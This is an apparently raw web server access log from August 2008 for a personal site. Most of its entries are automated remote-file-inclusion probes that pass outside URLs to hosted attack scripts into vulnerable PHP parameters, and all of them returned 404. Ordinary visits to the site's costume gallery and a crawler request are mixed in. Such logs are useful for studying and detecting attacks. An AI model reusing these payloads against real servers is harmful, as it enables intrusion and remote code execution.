218.38.54.160 - - [22/Aug/2008:08:43:44 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
218.38.54.160 - - [22/Aug/2008:08:43:45 -0500] "GET //skin/zero_vote/error.php?dir=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
218.38.54.160 - - [22/Aug/2008:08:43:46 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
198.66.222.121 - - [22/Aug/2008:08:43:55 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
198.66.222.121 - - [22/Aug/2008:08:44:42 -0500] "GET /logs/access_log.1203638400//skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
198.66.222.121 - - [22/Aug/2008:08:44:42 -0500] "GET //skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
198.66.222.121 - - [22/Aug/2008:08:44:42 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
198.66.222.121 - - [22/Aug/2008:08:44:51 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
218.38.54.160 - - [22/Aug/2008:08:46:27 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
92.51.130.118 - - [22/Aug/2008:08:46:45 -0500] "GET /logs/!scanhttp://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:08:46:45 -0500] "GET /!scanhttp://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:08:46:50 -0500] "GET /logs/!scanhttp://www.tes2008.kit.net/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:08:46:51 -0500] "GET /!scanhttp://www.tes2008.kit.net/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
198.66.222.121 - - [22/Aug/2008:08:47:57 -0500] "GET //skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
85.214.88.11 - - [22/Aug/2008:08:48:03 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://elpac.edu.mx/components/com_extcalendar/s.txt??? HTTP/1.1" 404 314 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.214.88.11 - - [22/Aug/2008:08:48:03 -0500] "GET //skin/zero_vote/error.php?dir=http://elpac.edu.mx/components/com_extcalendar/s.txt??? HTTP/1.1" 404 309 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.214.88.11 - - [22/Aug/2008:08:48:04 -0500] "GET //skin/zero_vote/error.php?dir=http://elpac.edu.mx/components/com_extcalendar/test.txt??? HTTP/1.1" 404 309 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
85.214.88.11 - - [22/Aug/2008:08:48:04 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://elpac.edu.mx/components/com_extcalendar/test.txt??? HTTP/1.1" 404 314 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
218.38.54.160 - - [22/Aug/2008:08:48:40 -0500] "GET //skin/zero_vote/error.php?dir=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
92.51.130.118 - - [22/Aug/2008:08:51:31 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:08:51:31 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
198.66.222.121 - - [22/Aug/2008:08:52:36 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
198.66.222.121 - - [22/Aug/2008:08:52:36 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
198.66.222.121 - - [22/Aug/2008:08:52:37 -0500] "GET //skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
198.66.222.121 - - [22/Aug/2008:08:52:37 -0500] "GET //skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
78.129.138.76 - - [22/Aug/2008:08:52:48 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://gabifir.yourfreehosting.net/z6id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
78.129.138.76 - - [22/Aug/2008:08:52:48 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://gabifir.yourfreehosting.net/z6id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
190.137.181.149 - - [22/Aug/2008:08:53:45 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
190.137.181.149 - - [22/Aug/2008:08:53:50 -0500] "GET /logs/access_log.1214179200%20//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 373 "-""libwww-perl/5.805"
190.137.181.149 - - [22/Aug/2008:08:53:53 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
203.22.204.97 - - [22/Aug/2008:08:54:51 -0500] "GET /logs/errors.php?error=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
203.22.204.97 - - [22/Aug/2008:08:54:51 -0500] "GET /errors.php?error=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
83.168.226.152 - - [22/Aug/2008:08:55:39 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://borneo.siteburg.com/splash.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
83.168.226.152 - - [22/Aug/2008:08:55:39 -0500] "GET //skin/zero_vote/error.php?dir=http://borneo.siteburg.com/splash.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
83.168.226.152 - - [22/Aug/2008:08:55:40 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://borneo.siteburg.com/splash.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
83.168.226.152 - - [22/Aug/2008:08:55:52 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://borneo.siteburg.com/splash.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
83.168.226.152 - - [22/Aug/2008:08:55:52 -0500] "GET //skin/zero_vote/error.php?dir=http://borneo.siteburg.com/splash.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
64.185.237.191 - - [22/Aug/2008:08:57:34 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://acceicc.com/uploads/idr.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
64.185.237.191 - - [22/Aug/2008:08:57:34 -0500] "GET //skin/zero_vote/error.php?dir=http://acceicc.com/uploads/idr.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
64.185.237.191 - - [22/Aug/2008:08:57:34 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://acceicc.com/uploads/idr.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.94.70.15 - - [22/Aug/2008:08:58:07 -0500] "GET /logs/index1.php?x=http://warsector.ru/access2006.log??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
69.94.70.15 - - [22/Aug/2008:08:58:08 -0500] "GET /index1.php?x=http://warsector.ru/access2006.log??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
69.94.70.15 - - [22/Aug/2008:08:58:09 -0500] "GET /logs/access_log.1208649600/index1.php?x=http://warsector.ru/access2006.log??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
69.94.70.15 - - [22/Aug/2008:08:58:09 -0500] "GET /index1.php?x=http://warsector.ru/access2006.log??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
69.94.70.15 - - [22/Aug/2008:08:58:09 -0500] "GET /logs/index1.php?x=http://warsector.ru/access2006.log??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
83.168.226.152 - - [22/Aug/2008:08:58:47 -0500] "GET /logs/access_log.1203638400//skin/zero_vote/error.php?dir=http://borneo.siteburg.com/splash.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
92.51.130.118 - - [22/Aug/2008:08:58:51 -0500] "GET /logs/access_log.1216598400%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1216598400%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1216598400&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3E...%20administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?%20...%201214438400/ktmllite/includes/ktedit/toolbar.php?dirDepth=http:/geocities.com%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1216598400%3C/span%3E%20-%20%3Cem%3E528k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu.qFwq5IXyYAu79XNyoA;_ylu=X3oDMTB0dWJqMDA2BHNlYwNzcgRwb3MDNTk3BGNvbG8DYWMyBHZ0aWQD/SIG=12h3e5da9/EXP=1219499013/**http%3a/www.bilgidepola.com/Board/archive/index.php/t-565.html/!scanhttp://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 469 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:08:58:51 -0500] "GET /!scanhttp://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:08:58:51 -0500] "GET /logs/access_log.1216598400%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1216598400%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1216598400&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3E...%20administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?%20...%201214438400/ktmllite/includes/ktedit/toolbar.php?dirDepth=http:/geocities.com%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1216598400%3C/span%3E%20-%20%3Cem%3E528k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu.qFwq5IXyYAu79XNyoA;_ylu=X3oDMTB0dWJqMDA2BHNlYwNzcgRwb3MDNTk3BGNvbG8DYWMyBHZ0aWQD/SIG=12h3e5da9/EXP=1219499013/**http%3a/www.bilgidepola.com/Board/archive/index.php/!scanhttp://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 469 "-""libwww-perl/5.803"
64.185.237.191 - - [22/Aug/2008:08:59:11 -0500] "GET //skin/zero_vote/error.php?dir=http://acceicc.com/uploads/idr.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.185.237.191 - - [22/Aug/2008:08:59:11 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://acceicc.com/uploads/idr.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.185.237.191 - - [22/Aug/2008:08:59:14 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://acceicc.com/uploads/idr.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
69.94.70.15 - - [22/Aug/2008:08:59:23 -0500] "GET /logs/access_log.1208044800/index1.php?x=http://warsector.ru/access2006.log??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
64.185.237.191 - - [22/Aug/2008:08:59:29 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://acceicc.com/uploads/idr.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
64.185.237.191 - - [22/Aug/2008:09:00:33 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://acceicc.com/uploads/idr.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
69.94.70.15 - - [22/Aug/2008:09:00:37 -0500] "GET /index1.php?x=http://warsector.ru/access2006.log??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
64.185.237.191 - - [22/Aug/2008:09:00:58 -0500] "GET /logs/access_log.1206576000//skin/zero_vote/error.php?dir=http://acceicc.com/uploads/idr.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
64.185.237.191 - - [22/Aug/2008:09:02:07 -0500] "GET /logs/access_log.1206576000//skin/zero_vote/error.php?dir=http://acceicc.com/uploads/idr.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
212.241.219.5 - - [22/Aug/2008:09:02:41 -0500] "GET /logs/access_log.1213401600//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 372 "-""libwww-perl/5.803"
216.180.251.34 - - [22/Aug/2008:09:05:21 -0500] "GET /logs/home.php?x=http://warsector.ru/access2006.log??? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
216.180.251.34 - - [22/Aug/2008:09:05:21 -0500] "GET /home.php?x=http://warsector.ru/access2006.log??? HTTP/1.1" 404 292 "-""libwww-perl/5.810"
195.199.190.37 - - [22/Aug/2008:09:05:56 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.199.190.37 - - [22/Aug/2008:09:05:56 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
170.185.56.19 - - [22/Aug/2008:09:06:22 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://search.babylon.com/?babsrc=home&q=middle+ages+700+AD-1400+AD""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:06:29 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:06:29 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:06:31 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:06:32 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:06:32 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:06:33 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:06:33 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:06:33 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:06:33 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:06:34 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:06:34 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:06:34 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:06:35 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
89.208.43.121 - - [22/Aug/2008:09:07:23 -0500] "GET /logs/errors.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:09:07:23 -0500] "GET /errors.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
170.185.56.19 - - [22/Aug/2008:09:07:26 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 2922 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:07:26 -0500] "GET /costume/costm26.jpg HTTP/1.1" 200 9402 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:07:26 -0500] "GET /costume/costm25.jpg HTTP/1.1" 200 9810 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:07:27 -0500] "GET /costume/costm27.jpg HTTP/1.1" 200 9516 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:07:27 -0500] "GET /costume/costm28.jpg HTTP/1.1" 200 10658 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:07:27 -0500] "GET /costume/costm29.jpg HTTP/1.1" 200 9835 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:07:27 -0500] "GET /costume/costm31.jpg HTTP/1.1" 200 9395 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:07:27 -0500] "GET /costume/costm30.jpg HTTP/1.1" 200 59433 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:07:27 -0500] "GET /costume/costm32.jpg HTTP/1.1" 200 9839 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:07:28 -0500] "GET /costume/costm33.jpg HTTP/1.1" 200 9703 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:07:28 -0500] "GET /costume/costm34.jpg HTTP/1.1" 200 9637 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:07:28 -0500] "GET /costume/costm35.jpg HTTP/1.1" 200 10912 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:07:28 -0500] "GET /costume/costm36.jpg HTTP/1.1" 200 9631 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
69.94.70.15 - - [22/Aug/2008:09:07:36 -0500] "GET /logs/access_log.1207699200/index1.php?x=http://warsector.ru/access2006.log??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
69.94.70.15 - - [22/Aug/2008:09:07:39 -0500] "GET /logs/access_log.1208736000/index1.php?x=http://warsector.ru/access2006.log??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
72.1.16.230 - - [22/Aug/2008:09:08:51 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.65"
72.1.16.230 - - [22/Aug/2008:09:08:51 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
74.6.8.121 - - [22/Aug/2008:09:08:55 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [22/Aug/2008:09:08:56 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
170.185.56.19 - - [22/Aug/2008:09:09:14 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3298 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:09:15 -0500] "GET /costume/costm37.jpg HTTP/1.1" 200 9819 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:09:15 -0500] "GET /costume/costm40.jpg HTTP/1.1" 200 60324 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:09:16 -0500] "GET /costume/costm45.jpg HTTP/1.1" 200 9735 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:09:16 -0500] "GET /costume/costm48.jpg HTTP/1.1" 200 10085 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:09:16 -0500] "GET /costume/costm38.jpg HTTP/1.1" 200 9710 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:09:16 -0500] "GET /costume/costm39.jpg HTTP/1.1" 200 9800 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:09:16 -0500] "GET /costume/costm41.jpg HTTP/1.1" 200 9976 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:09:16 -0500] "GET /costume/costm42.jpg HTTP/1.1" 200 9593 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:09:17 -0500] "GET /costume/costm43.jpg HTTP/1.1" 200 9745 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
